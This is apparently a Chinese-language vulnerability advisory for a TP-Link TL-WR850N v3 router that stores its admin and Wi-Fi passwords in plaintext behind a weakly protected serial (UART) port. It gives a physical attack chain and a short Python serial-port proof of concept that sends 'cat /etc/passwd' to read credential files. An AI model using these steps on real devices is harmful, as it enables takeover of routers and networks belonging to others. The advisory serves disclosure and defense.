CVE-2026-4346 CVSS 6.8 中危

CVE-2026-4346 TP-Link TL-WR850N路由器明文凭证泄露

披露日期: 2026-03-26

来源: f23511db-6c3e-4e32-a477-6aa17d310630

漏洞信息

漏洞编号

CVE-2026-4346

漏洞类型

信息泄露

CVSS评分

6.8 中危

攻击向量

物理 (AV:P)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

TP-Link TL-WR850N v3

漏洞概述

该漏洞影响TP-Link TL-WR850N v3路由器。由于设备串行接口保持开启状态且仅受弱认证保护，导致管理员密码和Wi-Fi密钥在设备闪存中以明文形式存储。拥有物理访问权限的攻击者可通过连接串口轻松恢复这些敏感信息，从而获得设备完全控制权及无线网络访问权限。

技术细节

该漏洞主要由两个设计缺陷导致。首先是串行接口（UART）的安全配置不当，路由器固件保留了调试接口的启用状态，且没有实施有效的访问控制（如复杂的密码验证），仅依靠默认或弱认证机制。其次是敏感数据的存储方式不安全，设备将管理员登录凭证和Wi-Fi预共享密钥（PSK）以明文形式写入Flash存储器的特定区域，未采用任何加密或混淆措施。攻击利用过程需要物理接触设备，通过识别路由器PCB板上的UART引脚（TX、RX、GND），使用TTL转USB适配器建立连接。利用串口通信工具（如Picocom或Python脚本）访问Bootloader或Shell环境，由于缺乏强认证，攻击者可以读取系统配置文件或直接转储Flash分区数据，从中提取出明文的账户密码和无线密钥，最终接管路由器。

攻击链分析

STEP 1

1. 物理接触

攻击者获得对TP-Link TL-WR850N v3路由器的物理访问权限。

STEP 2

2. 硬件连接

打开设备外壳，识别PCB板上的串行接口（UART）引脚（TX、RX、GND），并连接TTL转USB适配器。

STEP 3

3. 建立会话

使用终端软件（如PuTTY、Screen）或脚本连接到串口，利用弱认证机制获取Shell访问权限。

STEP 4

4. 提取数据

读取系统配置文件或直接转储Flash内存分区，查找存储在明文中的管理员密码和Wi-Fi密钥。

STEP 5

5. 接管控制

使用获取的凭证登录Web管理界面或SSH，获得设备的完全控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import serial
import time

# Conceptual PoC for reading serial data
# Target: TP-Link TL-WR850N v3 Serial Interface

def exploit_serial(target_port='/dev/ttyUSB0', baud_rate=115200):
    try:
        # Connect to the serial port
        ser = serial.Serial(target_port, baud_rate, timeout=1)
        print(f"[+] Connected to {target_port} at {baud_rate} baud")
        
        # Wait for boot or prompt
        time.sleep(2)
        
        # Attempt to bypass weak auth or read memory (conceptual)
        # In a real scenario, specific commands like 'cat /etc/config/wireless' or 'printenv' would be used
        payload = b"cat /etc/passwd\n" # Example command to read credentials
        ser.write(payload)
        
        time.sleep(1)
        
        # Read response
        while ser.in_waiting > 0:
            response = ser.readline().decode('utf-8', errors='ignore')
            if response:
                print(response.strip())
                
        ser.close()
        print("[+] Exploit finished.")
        
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    exploit_serial()

影响范围

TL-WR850N v3

防御指南

临时缓解措施

将路由器放置在安全的物理位置，限制未经授权的人员接触；定期更改管理员密码和Wi-Fi密码。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表